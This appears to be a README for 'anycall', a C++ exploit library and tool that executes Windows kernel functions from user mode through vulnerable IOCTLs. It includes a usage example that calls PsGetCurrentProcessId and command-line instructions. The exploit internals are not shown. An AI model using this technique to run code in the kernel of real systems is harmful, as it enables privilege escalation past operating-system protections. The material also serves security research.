x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
Release 2.0 includes libanycall
, the powerful c++ static-library for anycall
exploit execution.
#pragma comment( lib, "libanycall64" )
)#include "libanycall.h"
)For example:
#include <windows.h>
#include <iostream>
#include "libanycall.h"
#pragma comment( lib, "libanycall64" )
using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );
int main( const int argc, const char** argv, const char** envp )
{
if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
{
printf( "[!] failed to init libanycall\n" );
return EXIT_FAILURE;
}
// invoke NT kernel APIs from usermode
const uint32_t process_id =
( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );
printf( "PsGetCurrentProcessId returns %d\n", process_id );
return EXIT_SUCCESS;
}
anycall64.exe [module name] [procedure name]
*administrator privilege does not required to run
Following augments are supported:
(optional) module name
the module exports [procedure name]
e.g, ntdll.dll
(optional) procedure name
the function to hook, used to fetch from both ntoskrnl
and [module name]
e.g, NtTraceControl
if not specified, ntdll.dll
and NtTraceControl
are used.